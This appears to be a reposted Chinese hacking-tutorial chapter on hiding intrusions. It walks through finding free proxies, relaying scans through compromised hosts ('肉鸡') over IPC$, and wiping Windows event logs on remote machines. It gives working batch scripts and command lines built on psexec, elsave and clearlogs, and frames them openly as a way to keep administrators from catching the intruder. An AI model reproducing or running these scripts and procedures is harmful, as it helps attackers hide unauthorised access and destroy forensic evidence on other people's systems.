七:如何实现代理与日志清除技术
在找到遠程主機/服務器的系統漏洞之后,入侵者往往會對其進行試探性的入侵。此時為了避免被經驗豐富的網絡安全專家發現,入侵者會在入侵時使用各種方法隱藏自己,盡量不去直接與目標主機接觸,以免直接暴露給遠程主機/服務器。在隱藏自己的各種手段中,使用代理服務器和跳板技術是最為常見的一種。
主要內容:
·代理服務器軟件的使用
·日志文件的清除
7.1 代理服務器軟件的使用
代理服務器可用于局域網計算機與Internet連接時共享上網,而黑客則可通過代理服務器軟件對某臺計算機進行掃描,從而截獲目標計算機的重要信息,以達到入侵的目的。
7.1.1 利用代理獵手找代理
代理獵手是一款集搜索與驗證于一身的軟件,可以快速查找網絡上的免費Proxy。其主要特點為:支持多網址段、多端口自動查詢;支持自動驗證并給出速度評價;支持后續的時間預測;支持用戶設置最大連接數(可以做到不影響其他網絡程序)并運行自動查找最新版本。其最大的特點是搜索速度快,最快可以在十幾分鐘搜完整個B類地址的65536個地址。
代理獵手可以通過百度、雅虎、新浪等搜索引擎查找代理獵手下載鏈接進行下載。
1.添加搜索任務
在代理獵手安裝完畢后,還需要添加相應的搜索任務,具體的操作步驟如下。
STEP01:啟動“代理獵手”
STEP02:添加搜索任務
STEP03:地址范圍設置
STEP04:添加搜索IP范圍
STEP05:IP地址范圍添加成功
STEP06:進入“已定義的IP地址范圍”對話框
STEP07:添加搜索IP地址范圍
STEP08:查看已定義的IP地址范圍
STEP09:讀入地址范圍
STEP10:返回“已定義的IP地址范圍”對話框
STEP11:返回“地址范圍”對話框
STEP12:打開“端口和協議”對話框
STEP13:添加端口和協議
STEP14:返回“端口和協議”對話框
2.設置參數
在設置好搜索的IP地址范圍后,就可以開始進行搜索,但為了提高搜索效率,還有必要先設置一下代理獵手的各項參數。具體的操作步驟如下。
STEP01:打開“代理獵手”窗口
STEP02:運行參數設置
小技巧
代理獵手默認的搜索、驗證和Ping的并發數量分別為50、80和100,如果用戶的帶寬無法達到,就最好相應地減少各個并發數量,以減輕網絡的負擔。
STEP03:驗證數據設置
STEP04:代理調度設置
STEP05:其他設置
STEP06:返回主界面
3.查看搜索結果
在搜索完畢后,就可以查看搜索的結果,具體的操作步驟如下。
STEP01:查看搜索結果
“驗證狀態”為Free的代理,即為可以使用的代理服務器。
STEP02:查看代理調度
找到可用的代理服務器之后,右鍵單擊該代理,通過快捷菜單將選定的代理加入到調度中。這樣代理獵手就可以自動為服務器進行調度了,多增加幾個代理服務器有利于網絡速度的提高。
提示
一般情況下,驗證狀態為Free的代理服務器很少,但只要驗證狀態為“Good”就可以使用了。
小技巧
用戶也可以將搜索到的可用代理服務器IP地址和端口輸入到網頁瀏覽器的代理服務器設置選項中,這樣,用戶就可以通過該代理服務器進行網上沖浪。
7.1.2 用SocksCap32設置動態代理
SocksCap32代理軟件是一款基于Socks協議的網絡代理客戶端軟件,它能將指定軟件的任何Winsock調用轉換成Socks協議的請求,并發送給指定的Socks代理服務器。可用于使基于HTTP、FTP、Telnet等協議的軟件,通過Socks代理服務器連接到目的地。
使用SocksCap32軟件前,需要先有一個Socks的代理服務器(不管是用代理獵手找出來的,還是從各個代理網站中得到的,就是要有一個)。目前,SocksCap32軟件可以通過搜索引擎找到其下載地址,并將其下載到本地磁盤中。
1.建立應用程度標識
當第一次運行SocksCap32程序時,將顯示“SocksCap許可”對話框。在單擊“接受”按鈕接受許可協議內容后,才能進入SocksCap32的主窗口,如下圖所示。
“SocksCap許可”對話框
建立應用程序標識的具體操作步驟如下。
STEP01:打開SocksCap32主窗口
STEP02:新建應用程序標識項
STEP03:選擇需要代理的應用程序
STEP04:返回主窗口
提示
添加的應用程序可以是E-mail工具、FTP工具、Telnet工具,以及當今最熱門的聯網游戲等。
2.設置選項
設置SocksCap32選項的具體操作步驟如下。
STEP01:打開SocksCap32的主窗口
STEP02:SocksCap設置
在“Socks設置”選項卡中對服務器以及協議進行設置。
提示
如果用戶查找的代理服務器需要用戶名和密碼,且已獲得該用戶名和密碼,則可勾選“用戶名/密碼”復選框。若勾選“用戶名/密碼”復選框,則單擊“確定”按鈕后,需要在“用戶名/密碼驗證”對話框中輸入用戶名和密碼,如下圖所示。
STEP03:添加直接連接的IP地址等
STEP04:設置直接連接的應用程序和庫
STEP05:設置日志信息
在設置好代理選項并添加好代理應用程序后,在應用程序列表中選取需運行的應用程序,單擊“文件”>“通過Socks代理運行”菜單項,即可啟動該應用程序并通過代理進行登錄。如果需要使某個應用程序通過SocksCap32代理,則必須通過SocksCap32啟動。
7.1.3 防范遠程跳板代理攻擊
一些黑客技術本身,初一接手時還感覺不到它的妙處,越是使用得久,越能在不經意間發現其奧妙,遠程跳板代理攻擊模式即為這樣的一種技術。
1.掃描選擇目標
這里使用的工具是國內享有盛譽的流光軟件,主要理由是它所特有的一種掃描模式:遠程掃描模式。通過在對遠程肉雞上的安裝,就可以輕易實現掃描遠程的跳板式掃描。具體操作步驟如下。
STEP01:運行“Fluxay”軟件
STEP02:主機掃描設置
STEP03:開始掃描目標主機
STEP04:查看掃描結果
STEP05:返回主窗口
STEP06:IPC自動探測
STEP07:返回主界面
查看在目標主機下探測到的用戶。
2.代理跳板的架設
代理架設的方法很簡單,具體的操作步驟如下。
首先,通過3389遠程登錄自己的肉機,選擇“開始”,在搜索文本框中輸入cmd,即可進入“命令提示符”窗口。
然后在當前命令提示符下輸入“net use\\192.168.0.55""/user:"Administrator"”命令,即可建立空連接。稍等片刻,就會顯示“命令執行成功”信息。
7.2 日志文件的清除
日志文件記錄了用戶在系統中進行的所有操作,如系統中出現的錯誤、安全等問題,這樣日積月累下來,逐漸加重了服務器的負荷。對于黑客而言,這個記錄了入侵蹤跡的文件更應該及時清除掉,以免被管理員抓住“小尾巴”。
7.2.1 手工清除服務器日志
在入侵過程中,遠程主機的Windows系統會對入侵者的登錄、注銷、連接、甚至復制文件等操作進行記錄,并把這些記錄保留在日志中。在日志文件中記錄著入侵者登錄時所有的賬號以及入侵者的IP地址等信息。入侵者通過多種途徑來擦除留下的痕跡,往往是在遠程被控主機的“控制面板”窗口中打開事件記錄窗口,在其中對服務器日志進行手工清除。具體的操作步驟如下。
STEP01:IPC$成功連接
STEP02:打開“系統和安全”窗口
STEP03:查看各種工具
STEP04:打開“計算機管理”窗口
STEP05:查看事件類型
STEP06:查看事件實例
STEP07:查看事件具體信息
STEP08:刪除事件
7.2.2 使用批處理清除遠程主機日志
一般情況下,在Windows系統中,日志文件的擴展名為log、txt,這樣就可以編寫一個批處理文件來實現對日志文件的清除。具體的實現步驟如下。
STEP01:編寫一個批處理文件del.bat,代碼如下。
@del c:winntsystem32logfiles*.* @del c:winntsystem32config*.evt @del c:winntsystem32dtclog*.* @del c:winntsystem32*.log @del c:winntsystem32*.txt @del c:winnt*.txt @del c:winnt*.log @del c:del.bat
提示
在上面的代碼中echo是DOS下的回顯命令,在它的前面加上“@”前綴字符,表示執行時本行在命令行或DOS里面不顯示,另外del命令是刪除文件命令。
STEP02:再新建一個批處理文件clean.bat,其具體內容如下。
@copy del.bat \%1c$ @echo 向肉雞復制本機的del.bat ……OK @psexec \%1 c:del.bat @echo 在肉雞上運行del.bat ,清除日志文件……OK
STEP03:假設已經與肉雞進行了IPC$連接,則只要在MS-DOS命令提示符窗口中輸入“clean.bat肉雞IP”命令,就可以清除肉雞上的日志文件。
7.2.3 使用清理工具清除日志
日志文件記錄了用戶在系統中進行的所有操作,如系統中出現的錯誤、安全等問題,這樣日積月累下來,逐漸加重了服務器的負荷。對于黑客而言,這個記錄了入侵蹤跡的文件更應該及時清除掉,以免被管理員抓住了“小尾巴”。此時,黑客就會借助一些工具來清除日志。常用的工具是:elsave和CleanIISLog。這樣,就使清除日志工作變得更為簡單和快捷。
1.利用elsave清除日志
elsave是一款由小榕制作的清除日志工具,使用此工具不僅可以清除本地計算機的日志,還可以遠程刪除“事件查看器”中的相關的日志。
命令格式為elsave[-s\\server][-l log][-F file][-C][-q],其中各個參數的含義如下。
·-s\\server:指定遠程計算機。
·-l log:指定日志類型、其中“application”為應用程序日志;參數“system”為系統日志;參數“security”為安全日志。
·-F file:指定保存日志文件的路徑。
·-C:清除日志操作,注意“C”為大寫。
·-q:把錯誤信息寫入日志。
使用elsave.exe刪除遠程主機中日志的具體操作步驟如下。
STEP01:打開E盤根目錄
將“elsave.exe”粘貼至E盤根目錄。
STEP02:打開本地“命令提示符”窗口
輸入“net use\\192.168.0.7\ipc$/user:administrator”命令會出現“輸入密碼”提示信息。輸入遠程主機的密碼后,即可與遠程主機/服務器進行連接用IPC$連接。
STEP03:刪除遠程計算機中的應用程序日志
輸入e:,按“Enter”鍵切換至E盤跟目錄。然后輸入“elsave–s\\192.168.0.7–l"application"–C”命令即可。
STEP04:刪除該遠程主機中的系統日志
輸入命令“elsave–s\\192.168.0.7–l"system"–C”,即可將其刪除。
STEP05:清除遠程主機的安全日志
輸入“elsave–s\\192.168.0.7–l"security"–C”命令即可。在輸入命令時要注意命令的最后一個參數C,該參數一定要大寫,否則命令在運行時就會出錯。
STEP06:在本地“命令提示符”窗口中輸入“net use\\192.168.0.7\ipc$/del”命令,即可斷開IPC$連接。這樣,黑客便成功地刪除了遠程主機中的事件日志。
STEP07:也可以編寫一個批處理文件clear.bat,具體內容如下。
net use \\%1\ipc$ %3 /user:%2 elsave -s \\%1 -l "application" -C elsave -s \\%1 -l "system" -C elsave -s \\%1 -l "securtity" -C net use \\%1\ipc$ /del
STEP08:把該文件存儲到和Elsave.exe文件相同的文件夾下,在“命令提示符”窗口中運行“Clear.bat 192.168.0.7Adminstrator"037971"”命令,即可清除遠程計算機的日志記錄。
2.利用ClearLog工具清除日志
若想清理系統、安全與程序日志,也可利用ClearLog工具。由于該程序可直接進行遠程清理,不需要將此程序上傳到目標服務器中運行,利用它可以清理Windows的一般日志,包括系統日志(System Log)、安全日志(Security Log)與程序運行日志(Applications Log)。clearlogs的命令格式為:clearlogs[\\computername]<-app/-sec/-sys>。
-app=應用程序日志
-sec=安全日志
-sys=系統日志
下面以清除192.168.0.16機子上的事件日志為例進行介紹,具體的操作步驟如下。
STEP01:用IPC$連接把clearlogs上傳到遠程計算機。在MS-DOS命令提示符窗口中輸入命令“net use\\192.168.0.16\ipc$""/Susan”。
STEP02:清除遠程主機上的日志。再通過“net time”命令查看遠程計算機的系統時間,再用AT命令建立一個計劃任務來執行clearlogs.exe文件:AT時間c:\clear.bat。
clearlogs \\192.168.0.16 -app 清除遠程計算機的應用程序日志 clearlogs \\192.168.0.16 -sec 清除遠程計算機的安全日志 clearlogs \\192.168.0.16-sys 清除遠程計算機的系統日志
或者為了更安全一點,也可以建立一個批處理文件clear.bat。
@echo off clearlogs -app clearlogs -sec clearlogs -sys del clearlogs.exe del c.bat exit
STEP03:斷開IPC$連接。使用命令“net use\\192.168.0.16\ipc$/del”,經過上述操作之后,遠程主機中的日志記錄就可以被清除了。
通過執行上述命令,即可輕松將自己入侵的日志清除干凈,不必一個個去辛苦查找各項日志文件的存放位置后再清除,這兩個小工具會自動幫助用戶完成這些煩瑣的事情。但此工具只能刪除默認文件夾中的日志文件,如果目標服務器的網管將日志文件位置改到其他文件夾中,使用這個工具就不能清除。
總結
以上是生活随笔為你收集整理的七:如何实现代理与日志清除技术的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【正点原子STM32连载】第六章 新建寄
- 下一篇: 计算机组成原理-组成篇(下)